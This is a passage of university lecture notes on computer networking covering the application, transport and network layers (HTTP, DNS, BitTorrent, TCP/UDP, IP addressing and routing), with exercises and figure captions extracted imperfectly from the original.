• A session between two hosts in Eindhoven outside of peak hours.
Chapter 3
Application Layer
46
3.1. APPLICATION LAYER PROTOCOL: WHAT IS IT AND WHAT IS IT NOT?47
Web browser Surf the web: Hypertext Transfer Proto- HTTP is built into the
(e.g. Chrome, download web col (HTTP) web browser.
Firefox) pages.
Web browser Stream Flash Real Time Messaging Pro- The browser has a na-
video. tocol (RTMP) defined by tive player that imple-
Adobe Flash ments RTMP or it uses
Adobe Flash Player as
a plugin.
Web browser Stream HTTP Live Streaming Default browsers in
YouTube (HLS) iOS and Android
video. support HLS natively.
E-mail client Send and re- Exchange protocol and Protocols built into the
(e.g. Outlook, ceive e-mails. HTTP for mail in both application.
Mozilla Thun- directions. SMTP for
derbird) outgoing mail. POP3,
IMAP for incoming mail.
File trans- Transfer files File Transfer Protocol FTP is built into the
fer client from and to a (FTP) application client.
(e.g. FileZilla, server.
CyberDuck)
Table 3.1: Some applications, the application layer protocols supporting their
functions. The list of application protocols is not meant to be complete or
comprehensive. It serves as an example.
2 http://www.itv.com/news/2015-10-20/apple-withdraws-hundreds-of-apps-after-privacy-breach/
48 CHAPTER 3. APPLICATION LAYER
Figure 3.1: The number of apps in the Apple app store over years. (Figure
source: statista.com)
or end devices. They are application programs (or rather processes), which are
most of the time remotely located. These may also reside on the same end
device, e.g. two processes running in the same computer may communicate over
a network connection.
Furthermore, application layer protocols are not for the network core. A
design goal, which is particularly critical for large networks like the Internet,
is to push complexity to the network edge. In the Internet, a router does
not run user applications and application layer protocols because it would be
just too complex considering the combination with all the packet traffic and
processing it has to deal with. However, it is not strictly forbidden or impossible
to put an application in places other than end devices, e.g. for debugging or
testing purposes. In this course, we will disregard these exceptions and consider
that routers always implement up to layer 3 (network layer), and that layers 4
and 5 (transport and application layers) are implemented only by end devices.
Computer network applications of users live on end devices that communicate
over a network infrastructure as shown in Figure 3.2. An example is the relation
between a web browser program and a web server program.
Figure 3.2: Network applications and their protocols live on end devices. (Figure
by Kurose and Ross)
program code defining variables and actions on variables. The operating system
can create multiple processes from the same program. For example, you can
have multiple instances of a web browser program execute concurrently.
In this model, there is an always-on server (or a set of servers that share the
load) that runs an infinite server program at all times, 24/7, always ready to
serve requests of client processes. The server typically has access to an ample
amount of computation, storage and bandwidth resources, and has a permanent
network address (e.g. an IP address in the Internet). The client on the other
hand may be online or offline (on demand e.g. of its user) and can change its
(IP) address.
Figure 3.5: Multiple clients (client processes) connecting to a single server (pro-
cess) in the client-server model. (Figure by Forouzan)
Typically a lot of clients are served by a server. As of April 2016, there are
7000+ Tweet’s posted, 700+ Instagram photos uploaded, 53000+ Google search
queries submitted every second3 . This translates to huge client-server traffic.
In order to deal with these scalability issues service providers build very large
server farms that by themselves need huge amounts of power (Watts). That is
why server farm locations have to be chosen very carefully looking at climate
and nature (e.g. for water cooling).
Pure clients do not communicate directly with each other and if they do, at
least one of them has to have both client and server parts. If both have client
and server parts but they do not exactly act like a server (e.g. not always-on)
then the difference from the peer-to-peer model becomes a bit blurry. Note
that even applications with peer-to-peer architectures have client processes and
server processes (i.e. one initiates the connection and the other accepts it).
3 http://www.internetlivestats.com/one-second/
52 CHAPTER 3. APPLICATION LAYER
A transport layer protocol may provide some of these services. For example
the Transmission Control Protocol (TCP) of the Internet’s transport layer is
connection-oriented: a connection setup is required between client and server
processes. It provides reliable transport of application messages between sending
and receiving processes and it makes sure that packets are delivered to processes
in the correct order. It provides flow control between the sender and the receiver
such that the sender does not overwhelm the receiver by sending too much, too
fast. It is sensitive to increasing network traffic and implements congestion
control by throttling the sender process when network delays are high (i.e. long
router queues). However, TCP as a protocol does not provide delay, minimum
throughput or security guarantees.
User Datagram Protocol (UDP), on the other hand, does the bare minimum
expected from a transport layer protocol, that is process to process delivery of
data. UDP does not provide connection setup, reliability, flow control, conges-
tion control, timing guarantees, throughput guarantees, or security.
Why do we bother with UDP when TCP seems to provide all those services
that UDP does not? The answer lies in the simplicity and the speed of UDP.
Some services that are provided by TCP may not be needed. For example, if the
link is already reliable, you don’t need additional reliability from the transport
layer protocol. Moreover, if for some reason the application runs on top of
UDP, those extra services that are needed can always be implemented in the
application layer protocol (e.g. reliability). We will come back to UDP and
TCP later in Chapter 4.
Examples of application layer protocols and their underlying transport layer
support are given in Figure 3.9.
3.4. PROGRAMMING NETWORK APPLICATIONS 55
Figure 3.9: Transport layer protocols supporting various applications and appli-
cation layer protocols. (Figure by Kurose and Ross)
In order to address the destination process at the other side of the connection,
a process needs an identifier for the process, or equivalently, an identifier for the
corresponding socket.4
In the Internet, processes are identified by using IP addresses and port num-
bers. For example, a web browser addresses a web server using the IP address
of the web server (which is resolved from a web address) and the default HTTP
server port number 80. We will cover network sockets and process-to-process
addressing in much more detail in Chapter 4.
the world-wide web. Before we explain HTTP services, let us define some web
terms that will be used in this discussion. A web page consists of objects such
as HTML (Hypertext Markup Language) files, images, Java applets, and audio
files. Each object is associated with a URL. The HTML file is the base file that
contains text and several references to the other objects of the web page in the
form of URLs.
The client process (e.g. a web browser like Google Chrome, Internet Ex-
plorer) requests, receives, and displays web objects. The server process (e.g.
an Apache web server) sends objects in response to HTTP requests as shown
in Figure 3.10. HTTP uses a TCP connection on the well-known HTTP port
number 80. In one of the lab sessions you are asked to build such a web server.
Figure 3.10: HTTP request and response. (Figure by Kurose and Ross)
HTTP request message: The exact format of the HTTP request message
is as shown in Figure 3.12. An example HTTP request message is given in
Figure 3.13.
• Request line: This is the first line that indicates the type of the re-
quest (method), the directory “path” of the requested object URL, and
the HTTP version.
3.5. EXAMPLE APPLICATION LAYER PROTOCOLS 57
Figure 3.11: HTTP message flow diagram upon entering the URL www.win.tue.
nl/index.html. (Figure by Kurose and Ross)
• Header lines: The header lines in this field contain information such
as the “host” part of the requested object’s URL, the name of the web
browser, the requested type of connection (persistent or not) and the re-
quested language (useful if the web server provides versions in multiple
languages, e.g. when you want to view the web page in Dutch).
• Carriage return, line feed: Indicates the end of the HTTP request
header. The body of the message (i.e. the application payload) follows
this.
Figure 3.13: HTTP request message example. (Figure by Kurose and Ross)
HTTP response message: The exact format of the HTTP response message
is as shown in Figure 3.14. An example HTTP response message is given in
Figure 3.15.
• Response line: This is the first line that contains the HTTP version and
the response code, e.g. 200 OK, 404 Not Found.
• Header lines: The header lines in this field contain information such as
type of connection (persistent or not), date and time of response, server
software identification, date and time of last modification for the object
included in the response, the object length and the object type.
• Carriage return, line feed: Indicates the end of the HTTP response
header. The requested object follows this.
Figure 3.15: HTTP response message example. (Figure by Kurose and Ross)
to keep state and HTTP’s cookie header line (added after cookie introduction)
facilitates this.
A cookie is a file created and stored by the client based on an HTTP request-
response interaction and it is managed by the web browser. Every time the
client visits the same website the cookie identity is communicated inside the
HTTP request message. The web server can do some cookie specific action with
this information (e.g. book recommendation by the bookstore) using the data
accumulated about this specific client at a back-end database. This is illustrated
in Figure 3.16.
Since cookies allow a website to gather information about a user (what you
like, what you search etc.) it can potentially allow third parties to identify you,
which is a clear privacy issue.
• Address resolution.
In the hierarchical name space of DNS, each name is made of several parts.
This hierarchy corresponds to a tree structure as shown in Figure 3.18. A domain
is nothing but a subtree of this tree structure. Each domain is identified by a
domain label and the top level domain labels are, e.g. generic (3 letters) such
as com, edu, org, net, or per country (2 letters) such as nl, fr. Finally, a domain
name is a sequence of labels separated by dots, e.g. win.tue.nl is with labels
win, tue and nl.
If a DNS server knows how to translate the queried domain name, it responds
with the translation. If a DNS server does not know how to translate a particular
domain name, it asks another one, and so on in a hierarchical manner, until the
correct IP address (or domain name in case of inverse translation) is returned.
Two types of DNS query handling are shown in Figure 3.19, where a host at
cis.poly.edu wants to find out the IP address for gaia.cs.umass.edu. On
the left, a recursive DNS query to the authoritative DNS server is followed by
a number of iterative DNS queries. On the right, the figure shows all recursive
DNS queries. In the “all recursive” case the requesting host puts the burden of
name resolution on the hierarchy of DNS name servers, which results in heavy
load for the DNS infrastructure, especially when we consider huge numbers of
queries (what happens in reality). The use of both UDP and TCP is possible
in DNS, on port number 53.
The DNS server hierarchy is exemplified in Figure 3.20, where the Top-Level
Domain (TLD) servers are responsible for all top-level country domains as well
62 CHAPTER 3. APPLICATION LAYER
Figure 3.19: DNS queries. Left side: iterative and recursive queries mixed.
Right side: All recursive queries. (Figure by Kurose and Ross)
as for com, org, net, edu, etc. Authoritative DNS servers are DNS servers of
individual organizations. These DNS servers provide authoritative hostname
to IP mappings for an organization’s servers (e.g. Web, mail). They can be
maintained by the organization or its service provider.
3.5.3 BitTorrent
In peer-to-peer file sharing, a peer starts to serve as a file source as soon as it
receives some part of the file from another peer, i.e. it shares what it has already
received. Due to difficulties in managing content that is shared, peer-to-peer
file sharing has been subject to many lawsuits.
BitTorrent is an application layer protocol for file sharing. Here the term
torrent refers to a set of peers sharing parts of a file (i.e. each peer shares the
3.5. EXAMPLE APPLICATION LAYER PROTOCOLS 63
parts it has).
Exchanging File Chunks: In BitTorrent the shared files are first divided into
chunks of size 256 KB. When trackers are used a new peer registers with the
tracker to get a list of peers that are participating in the same torrent. This new
peer does not yet have any chunks and starts accumulating chunks after making
TCP connections to some peers. The peers with which a TCP connection is
established are called neighbors. The new peer starts downloading the chunks
it does not have. For that it asks each of its neighbors for a list of chunks that
they have and it requests the chunks it does not yet have. In doing so it starts
with the most rare chunks. In the meantime it uploads the chunks it has already
accumulated to other peers. Every 10 seconds a peer ranks its neighbors based
on the respective download rates from these neighbors. The peer sends chunks
to the top four neighbors in this ranking.
Every 30 seconds a peer (say Alice) randomly selects another peer to send
chunks to so that new peers (who do not have many chunks to share) get a chance
to make it to the top four list of other peers and ramp up their download speeds.
If the new peer (say Bob) reciprocates, it may get into the top four senders list
of Alice, effectively ramping up his download and upload speeds.
Figure 3.21: The list of top 4 providers for a peer changes dynamically, over
time leading to larger cumulative upload and download speeds . (Figure by
Kurose and Ross)
After receiving the entire file the peer continues to upload without down-
loading.
64 CHAPTER 3. APPLICATION LAYER
3.5.4 Blockchain
Blockchain is a protocol for building applications for distributed bookkeeping
purposes. Consider a bank that is responsible for bookkeeping of transactions
of the bank clients. The bank transaction records represent a centralized ledger
that contains such bookkeeping while hiding transactions of individual clients
from each other and from other parties. Alternative to this is a decentralized
ledger implemented on a distributed P2P network, i.e. a blockchain. The ledger
is maintained by the peers and it is important to make sure that the transac-
tions are consistent from the perspectives of all joining peers. A ledger consists
of a chain of records (data structures) that are called “blocks”, hence the name
“blockchain”. Blocki contains a record including some transactions, a times-
tamp and an encrypted hash of the previous block, H(Blocki−1 ) as shown in
Figure 3.23.
In a blockchain every peer can see and verify all transactions. Note that this
is the opposite of traditional bookkeeping practice. Inserted blocks are there to
stay, i.e. it is only possible to add information to a blockchain (no deletions).
3.6 Summary
The goal of this chapter was to provide an overview of the application layer,
including possible architectural styles and its service models as well as the ser-
vices it needs from the transport layer. The socket API gives the necessary tools
to program network applications. The concepts introduced were exemplified by
three famous application layer protocols. The reader should now be able to
make the separation between an application and the application layer protocol
that supports the application.
3.6.1 Literature
Suggested reading
• Chapter 2 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 2].
Suppose that the average object size is 900,000 bits and that the average
request rate from the institution’s browsers to the origin servers is 1.5
requests per second. Also suppose that the amount of time it takes from
when the router on the Internet side of the access link forwards an HTTP
request until it receives the response is two seconds on average. In this
exercise we model the total average response time as the sum of the average
access delay (that is, the delay from Internet router to institution router)
and the average Internet delay. For the average access delay, use △/(1 −
△β), where △ is the average time required to send an object over the
access link and β is the arrival rate of objects to the access link.
Transport Layer
Figure 4.2: The position of the transport layer in the Internet protocol stack.
(Figure by Forouzan)
In this chapter, the issues addressed by transport layer protocols and trans-
67
68 CHAPTER 4. TRANSPORT LAYER
port layer service models are introduced. The two transport layer protocols of
the Internet, UDP and TCP are explained and standard problems are discussed
in this context. Precisely, we try to answer the following questions:
• What are the principles of transport layer services and protocols?
• How to realize reliable process-to-process delivery, flow control and con-
gestion control?
• What are the details of transport layer protocols of the Internet?
In this text we will focus on the reliable transfer service provided in the Internet’s transport
layer.
4.2. ADDRESSING PROCESSES AND PACKETIZATION 69
Transport Layer Multiplexing: At the sender side, the transport layer re-
ceives data from sender processes and encapsulates these in transport layer
segments by adding transport layer headers to them. Finally, these seg-
ments are passed to the network layer for further processing.
Transport Layer Demultiplexing: At the receiver side, the segments that
are passed from the network layer to the transport layer are examined and
the data extracted from these are directed to their respective destination
processes.
The destination IP is enough to address the destination host. However, by
itself, it is not enough to point to the destination process. Individual processes
running on a given host are identified by their port numbers, which they acquire
via the socket API. As we discussed earlier in Chapter 3, process-to-process
addressing requires makes use of network sockets. A socket is identified by a
combination of IP number(s) and port number(s).
A port number is a 16-bit integer that takes a value between 0 and 65535.
Internet Assigned Numbers Authority (IANA), which is a sub-department of
Internet Corporation for Assigned Names and Numbers (ICANN), is the offi-
cial authority that ‘reserves’ port numbers to various applications. The port
numbers ranging from 0 to 1023 (also known as well-known port numbers) are
reserved for applications such as FTP (file transfer), HTTP (world-wide web)
and SMTP (e-mail).
port numbers and network sockets. Note that even though this may not be
‘good practice’, it is not strictly forbidden to do it differently and you may find
operating systems that allow alternative ways.
– Two processes may listen on the same port number. For example, a
web server can run multiple processes listening on the port number
80. When a transport layer segment with destination port number
80 arrives to this server, the extracted data is sent to one of these
web server processes by the transport layer.
• Is there a single network socket per process or can a process use more than
one socket?
– There can be more than one socket per process, each with a unique
identifier. The exact format of the identifier depends on whether the
socket is a UDP or TCP socket.
– Yes, this is possible with UDP. TCP does not allow this as it is
based on a ‘connection’ with only one sender and one receiver (see
Section 4.3).
• How does IANA enforce the use of well-known port numbers explicitly by
certain application types?
is a one-to-one communication and another web browser may not make HTTP
requests to the same socket (but it may make HTTP requests to the same
process through another TCP socket).
A connection between the processes is established using a message exchange
procedure called a ‘three-way handshake’ as shown in Figure 4.4.2 A connection
is terminated as shown in Figure 4.5.
A connection-less service on the other hand does not require the establish-
ment of a connection prior to data transfer and it is stateless. Processes are free
to send data packets to any connection-less socket and all will be delivered to the
receiving process through the socket. UDP is an example of a connection-less
transport layer protocol.
2 You may ask yourself why three-way handshake when there are a total of 4 messages. It
is because the second and the third messages are typically merged into one message. In full-
duplex communication where data packets flow in both directions, sending acknowledgement
data together with application data is called piggybacking.
72 CHAPTER 4. TRANSPORT LAYER
4.4.1 UDP
UDP is a connection-less transport layer protocol that provides multiplexing and
demultiplexing as the only services. Although UDP lacks most of the services
that TCP provides, UDP applications enjoy advantages of its simplicity:
• UDP packet header size is only 8 bytes and that means very small com-
munication overhead in comparison to 20+ bytes long TCP headers. This
is especially important if the application needs to communicate very little
data (a few bytes) very often.
• UDP does not perform congestion control, which means that UDP appli-
cations can utilize the full speed of the communication channel.
Figure 4.7: The destination process is addressed using the destination IP address
and the destination port number. (Figure by Forouzan)
The UDP sender computes the checksum over certain parts of the IP header
(called the pseudo IP header), the UDP header and the payload. The compu-
tation considers all this as a sequence of 16-bit integers and adds them up (1’s
complement sum). The checksum is the 1’s complement of the result. In order
to check for errors, the UDP receiver simply has to compute the checksum of
a received packet again and compare it with the checksum header field value.
If these two values are not equal, the receiver concludes that the segment is
corrupt and discards the segment. Note that this method may still miss some
errors, i.e. when two or more bits are flipped.
4.4.2 TCP
TCP is a connection-oriented transport protocol that provides extra services on
top of multiplexing and demultiplexing such as
74 CHAPTER 4. TRANSPORT LAYER
• flow control
• congestion control
Figure 4.9: TCP sockets, buffers and the (byte stream) connection between two
processes. (Figure by Kurose and Ross)
• source IP address
• destination IP address
In demultiplexing, the receiver uses this full identifier consisting of four parts
to choose the correct delivery socket (hence the correct process). Because of
this, for example a web server is able to deal with many TCP connections from
different users at port number 80. Since the source IP addresses and/or source
port numbers of the web browsers of individual users are different, their TCP
segments are delivered to different TCP sockets with identical destination IP
and destination port number fields. This is illustrated in Figure 4.10 using the
web server example.
Even for the same user, (non-persistent) parallel HTTP connections will re-
sult in a different socket (identifier) for each request since parallel TCP connec-
tions will have different source port numbers. This is illustrated in Figure 4.11.
Figure 4.10: TCP demultiplexing for segments with identical header fields except
for sender’s IP address. (Figure by Kurose and Ross)
Figure 4.11: TCP demultiplexing for segments with identical header fields except
for sender’s port number. P2 and P3 together could have been a single process
but that would not change anything. (Figure by Kurose and Ross)
• The second word contains the sequence number, which is in fact the index
of the first byte of the segment within the whole byte stream. Note that
the numbering is on the byte count and not the segment count. Therefore,
consecutive segments do not necessarily have sequential numbers. Further-
more, the sequence numbers in each direction are independent and both
start from a random value. Numbering is used for error control and flow
control.
• The fourth word starts with the HLEN field that indicates the total length
of the TCP header in number of words. This is followed by 6 bits that
are reserved3 for future use. The window size field indicates the number
3 Three of the six are already standardized in the meantime. Interested students can check
of bytes that the receiver is willing to receive and is used for flow control.
The six 1-bit flags are:
• The fifth word contains checksum and urgent pointer fields. The checksum
use is the same as in UDP. The urgent pointer field is used if the URG
flag is set and it is an offset from the sequence number indicating the last
urgent data byte.
• The first five words of the header are followed by the ‘Options and padding’
fields, which can be up to 10 words long (HLEN determines the total
length). We will not discuss these. Padding refers to filling with zeros
until the total header length is an integer multiple of 32 bits.
The receiver side uses buffering, sequence numbers, TCP checksum and
cumulative acknowledgements for contributing to reliable data delivery.
• The TCP receiver detects and discards segments that are corrupted (using
checksum) or that are duplicates (using sequence numbers).
• The receiver confirms the reception of bytes to the sender side by sending
cumulative acknowledgements. Precisely, the receiver acknowledges the
sequence number of the next byte that is expected. The events leading to
acknowledgement generation by the receiver are given in Figure 4.13.
• The receiver buffers the segments that are received out-of-order and deliv-
ers data to the destination process only after filling in the gaps (i.e. data
arrives at the process in order). When segments arrive at the receiver out-
of-order, the receiver acknowledges the first byte of the gap (at the lower
end). Therefore, repetitively receiving out-of-order packets that do not
contain the ‘next expected byte’ will trigger duplicate acknowledgements.
The sender side relies on TCP retransmission timer and counting duplicate
acknowledgements for making a decision to retransmit segments or not.
• The TCP sender maintains four timers (Figure 4.14). One of these timers
is the retransmission timer. If an acknowledgement confirms the recep-
tion of previously unacknowledged packets, this timer is either stopped
or reset (see the exact operation of the TCP sender with retransmission
timer and acknowledgements in Figure 4.15). TCP interprets expiration
of this timer as an indication of congestion. When the timer expires, the
TCP sender retransmits the segment and resets the timer. Figure 4.16
gives examples of TCP retransmission scenarios.
• Fast retransmit: The retransmission timer may take a long time to ex-
pire, resulting in late retransmissions of lost packets. The TCP sender
continuously checks the acknowledgement numbers filled in by the re-
ceiver and tries to identify packet losses by looking at duplicate acknowl-
edgements. The logic of ‘fast retransmit’ is simple: The sender typically
pipelines its segments and sends many segments in a short time. If there
is congestion, it is likely that a lot of these segments will be lost and the
sender will not get many (duplicate) acknowledgements. However, if it
is just a single segment (or a few) that is lost, there will be many dupli-
cate acknowledgements (asking for the first byte of the gap). When the
TCP sender receives 3 acknowledgements pointing to the first byte of the
lost segment, it will go into the fast retransmit mode and retransmit this
segment. The necessary modification to the TCP sender to include fast
retransmit is shown in Figure 4.17, together with an example.
4.4. INTERNET’S LAYER 4 PROTOCOLS: UDP AND TCP 79
Figure 4.17: Simplified TCP sender operation with fast retransmit (without
congestion control and flow control). (Figure by Kurose and Ross)
The Internet is an global heterogeneous network with hosts and access links
working at different speeds. Imagine that an application on your smart watch
is downloading a large file (e.g. an operating system update). The download
throughput that is available can be much more than that can be handled by
the smart watch, for example, if writing to the secondary storage is slow on the
smart watch. What is needed for correct operation is a bitrate (bits per second)
matching service between the sender process and the receiver process. This is
more or less what the flow control of TCP does.
The receiver fills in the window size field of each TCP segment (i.e. in pure
acknowledgements or in data segments in two-way communication) the number
of bytes that it is still willing to receive it its buffer (see Figure 4.18). The
sending process uses this information to adjust its speed. A window size of zero
causes the sender to stop sending data and start the persistence timer. When
this timer expires, the sender sends one (small) packet to probe the status of
80 CHAPTER 4. TRANSPORT LAYER
Figure 4.18: The receiving process may be slow at reading from this buffer.
(Figure by Kurose and Ross)
Slow Start and Additive Increase: The TCP sender starts with a con-
gestion window (cwnd) that is equal to 1 segment (with size maximum
segment size (MSS)4 ). At this slow start phase, starting from a cnwd of 1
the sender is trying to go up to a large congestion window very quickly. To do
this, the sender increases its congestion window size by 1 segment until cwnd
reaches a threshold value (effectively an exponential increase of speed un-
til the threshold). At this point the sender goes into a congestion avoidance
phase where cwnd is increased by 1/cwnd segments for each successfully received
acknowledgement until cwnd is equal to the receiver window size.
At any given time during transmission the send window of the sender (i.e.
maximum number of in-flight segments) is equal to the minimum of the receiver’s
advertised window size and the congestion window size cwnd.
TCP Vizualizer
Visit http://www.win.tue.nl/~mholende/tcpviz/ in order to download TCP
vizualizer software tool that is developed and maintained by Dr. Mike Holen-
derski.
TCP Visualizer aims at showing the differences between three flavours of the
TCP protocol: TCP Tahoe, TCP Reno and TCP New Reno. It shows different
views on the TCP protocol from the perspective of the sender:
• the outgoing buffer together with the sliding congestion window (CWND)
• a plot of the CWND size and threshold (SSTHRES) against time and
against round-trip time (RTT)
4.5 Summary
Transport layer provides services on top of the network layer. The most basic
transport layer service is process addressing and process-to-process data delivery.
UDP provides only these basic services while TCP provides additional services,
82 CHAPTER 4. TRANSPORT LAYER
4.5.1 Literature
Suggested reading
2. Consider sending a large file from one host to another over a TCP connec-
tion that has no loss.
(a) Suppose TCP uses AIMD for its congestion control without slow
start. Assuming CongWin increases by 1 MSS every time a batch of
ACKs is received and assuming approximately constant round-trip
times, how long does it take for CongWin to increase from 1 MSS to
8 MSS (assuming no loss events)?
(b) What is the average throughput (in terms of MSS and RTT) for this
connection up to time = 7 RTT?
(a) Identify the intervals of time when TCP slow start is operating.
(b) Identify the intervals of time when TCP congestion avoidance is op-
erating.
(c) After the 16th transmission round, is segment loss detected by a triple
duplicate ACK or by a timeout?
(d) After the 22nd transmission round, is segment loss detected by a
triple duplicate ACK or by a timeout?
(e) What is the initial value of Threshold at the first transmission
round?
(f) What is the value of Threshold at the 18th transmission round?
(g) During what transmission round is the 70th segment sent?
(h) Assuming a packet loss is detected after the 26th round by the receipt
of a triple duplicated ACK, what will be the values of the congestion
control window size and of Threshold?
(a) Consider a reliable data transfer protocol that uses only negative
acknowledgments (NAKs). Suppose the sender sends data only in-
frequently. Would a NAK-only protocol be preferable to a protocol
that uses acknowledgments (ACKs) only? Why?
(b) Now suppose the sender has a lot of data to send and the end-to-end
connection experiences few losses. In this case, would a NAK-only
protocol be preferable to a protocol that uses ACKs? Why?
Chapter 5
Network Layer
84
5.1. INTERNETWORKING 85
5.1 Internetworking
The host-to-host path in a computer network may pass through many types of
(wired and wireless) physical network links, and the internetworking service
provided by the network layer is an abstraction from this diversity. Further-
more, despite the variety of link technologies and the link-specific addresses and
protocols, the transport layer enjoys a uniform numeric addressing scheme
provided by the network layer.
The network layer of the Internet is implemented in both the network edge
(hosts: clients, servers, peers) and the network core (routers) as shown in Fig-
ure 5.2.
Figure 5.2: Network layer protocol is implemented in every router and host.
(Figure by Kurose and Ross)
In the Internet setting, the routers in the network core interconnect subnet-
works (also known as subnets) and they correspond to the gateways mentioned
in this definition.
5.2.1 Packetization
Network layer packetization refers to the encapsulation of transport layer seg-
ments into network layer datagrams by the sending host and the delivery of
these segments to the transport layer by the receiving host.
IP version 4 (IPv4)
The packet format of IPv4 datagrams is shown in Figure 5.4.
1 Note that sessions may still exist at higher layers, but the network core does not give
Fragmentation fields:
Time To Live (TTL): The number of hops (links) that the datagram is still
allowed to take (value decremented at each router).
Protocol: Target layer 4 protocol for the payload of the datagram.
Header checksum: 16-bit checksum of the IP header as shown in Figure 5.5.
The payload is not included in the checksum calculation.
Source and destination IP addresses: IPv4 addresses are 32-bit network
layer identifiers of link interfaces of Internet hosts and routers. IPv4 ad-
dresses use the dotted decimal notation as shown in Figure 5.6.
Since routers have multiple link interfaces they have multiple IP addresses,
one for each interface. A significant portion of modern hosts also have
multiple link interfaces (e.g. one Ethernet, one WiFi) and multiple IP
addresses. Using 32 bits we can individually address 232 (roughly 4 billion)
IPv4 node interfaces, which is insufficient in our day.
Option: This part contains extra information fields that are mostly skipped.
We will not study those in this course.
88 CHAPTER 5. NETWORK LAYER
IPv4 Fragmentation
The maximum size of the payload that can be encapsulated within a data link
layer frame is dependent on the specific link type. This size is referred to as
the Maximum Transmission Unit (MTU). For example, Ethernet has an MTU
of 1500 bytes while WiFi (wireless IEEE 802.11 protocol) has an MTU of 2400
bytes. Upon transmitting a datagram on the outgoing link, if the size of the
IP datagram is larger than the link MTU, the transmitter (i.e. a source host
or a router on the path) needs to divide the datagram into pieces that can
fit in a frame. This is called fragmentation. After fragmentation, individual
fragments travel to the destination host independently from each other and they
are reassembled into the full IP datagram only at the last destination host.
The second word (second line) of the IPv4 header contains fields that are
dedicated to this purpose as shown in Figure 5.4.
IP version 6 (IPv6)
IPv6 was developed as a result of the 32-bit IPv4 address space being completely
exhausted. IPv6 addresses consist of 128-bits, which means that there are 2128
IPv6 addresses. Just to put this amount in perspective, this is (way) more than
enough to give an IPv6 address to every piece of sand in the entire world.
The packet format of IPv6 is simpler than the IPv4, which speeds up pro-
cessing at routers. The packet format is shown in Figure 5.9. The ‘option’ fields
have been removed from the basic header but this type of information (indicated
by the ‘Next header’ field) can now be part of the payload. In IPv6, routers
5.2. DATAGRAM NETWORKS 89
Figure 5.7: IPv4 datagram that is fragmented when moving towards link with
smaller MTU: Different fragments may take different paths and they are re-
assembled in the destination host. (Figure by Kurose and Ross)
do not deal with fragmentation. Sending hosts are required first to decide on a
datagram size using MTU discovery along the host-to-host path.
One of the goals of the IPv6 original design was to add security features
to IP. The Internet Protocol Security (IPsec) is a set of protocols for
authentication and encryption of IP packets. It was originally designed for
IPv6.
VER: IP version (v6).
PRI: Priority field used to classify packets.
Flow label: Labels packets belonging to the same flow with the same number.
Routers can use this information so that the packets take the same path
and maintain the same order.
Payload length: The payload length in number of bytes.
Next header: Specifies the transport layer protocol or the type of payload
extension headers that follow.
90 CHAPTER 5. NETWORK LAYER
Figure 5.11: A network with three subnets. (Figure by Kurose and Ross)
Figure 5.13: Classful IPv4 addressing: Netid and Hostid parts of different classes.
The example shows the efficiency of assigning different class address spaces to
an organization with 2000 hosts. (Figure by Forouzan)
Assigning class B would result in a waste of more than 63K IPv4 addresses and
we can make class B assignments to at most 16368 such organizations. On the
other hand, assigning class C is not possible since class C gives only 256 distinct
addresses in each block. A workaround for this problem would be to assign
multiple class C blocks to the organization.
92 CHAPTER 5. NETWORK LAYER
Figure 5.14: CIDR notation: Subnet part and host part of an IPv4 address.
(Figure by Kurose and Ross)
Figure 5.15: DHCP: New host needs IP in the top right subnet. (Figure by
Kurose and Ross)
subnet.
5.4. NETWORK LAYER ROUTING 93
4. The DHCP server assigns and sends the IP address in a “DHCP ack”
message.
Figure 5.16: The routing algorithm determines the forwarding tables of the
routers. (Figure by Kurose and Ross)
Figure 5.17 shows how a forwarding table of a router could look in principle,
with one entry per destination IP. However, such a forwarding table is impossi-
ble to maintain and use for a simple reason. Even with IPv4 addresses consisting
of 32 bits there would need to be around 4 billion entries in such a forwarding
table and every forwarding operation would require a look-up among these en-
tries. Furthermore, the amount of information exchange of the routing protocol
for maintaining forwarding tables of routers would cause a constant state of
congestion, rendering the Internet unusable for any other data communication.
Internet addressing is hierarchical. Hosts lease IP addresses from their sub-
nets. The network administrator of the subnet can acquire a block of IP ad-
dresses for the subnet from an Internet Service Provider (ISP). The ISP itself
94 CHAPTER 5. NETWORK LAYER
Figure 5.17: Example (impractical) forwarding table with one entry per IP
address. (Figure by Kurose and Ross)
Figure 5.18: An ISP’s address space allocated evenly to eight customer organi-
zations. (Figure by Kurose and Ross)
Instead of employing the very inefficient scheme of one entry per destina-
tion IP (giant forwarding tables), routing in the Internet is solved within the
addressing hierarchy of the Internet as a network of (sub)networks. Routers do
longest prefix matching for maintaining their forwarding tables and realizing
their forwarding behavior as shown in Figure 5.19.
Groups of subnetworks called autonomous systems (AS) have freedom in
how they deal with routing internally and they advertise to other autonomous
systems the IP prefixes that are reachable through them as well as the associ-
ated cost (e.g. in number of subnets till the destination network etc). This is
exemplified in Figure 5.20.
Now consider the situation after ISPs-R-Us (an autonomous system) has
found a better route to Organization 13 . Figure 5.21 shows the new route
advertisements in this case.
3 For example, it may be that Organization 1’s link connection to Fly-By-Night-ISP is
somehow disconnected.
5.4. NETWORK LAYER ROUTING 95
Figure 5.19: Example forwarding table with longest prefix match. (Figure by
Kurose and Ross)
Figure 5.21: New routing advertisements after ISPs-R-Us has found a better
route to Organization 1. (Figure by Kurose and Ross)
Internally, each autonomous system can run its own (intra-AS) routing pro-
tocol for reaching hosts inside the autonomous system. On the other hand,
the (inter-AS) routing protocol at autonomous system boundaries (at border
gateway routers) towards other autonomous systems must be standardized.
Notice: The lecture slides contain sufficient explanations that are needed
for the Internet’s routing protocols, which are not repeated in this document
(at least not this year: we are doing our best to produce text and enrich the
lecture notes every year). It may be a good time now to switch to lecture slides,
study the relevant slides and come back. Note that you are responsible for both
the slides and these notes in the exam.
Figure 5.22: Virtual circuit: all packets taking the same path through the same
routers from the source host till the destination host. (Figure by Kurose and
Ross)
address is processed by each router on the path. On the contrary, in virtual cir-
cuits the virtual circuit identifier can be a different number on each link. Each
router on the host-to-host path maintains this information, i.e. the virtual cir-
cuit numbers in its incoming and outgoing links for each virtual circuit, as part
of the connection state.
Similar to physical circuit switching, virtual circuit sessions (or calls) require
call setup, call maintenance and call termination procedures. During call setup
the caller initiates the call and the callee accepts the call by sending a reply as
shown in Figure 5.23. After this point, the connection is established and data
can start flowing in the virtual circuit.
Figure 5.23: Virtual circuit call setup. (Figure by Kurose and Ross)
5.6 Summary
Network layer services are essential for host-to-host communication in computer
networks. An important service is ‘hierarchical’ network layer addressing, which
reduces routing complexity and makes it possible to deal with billions of IP ad-
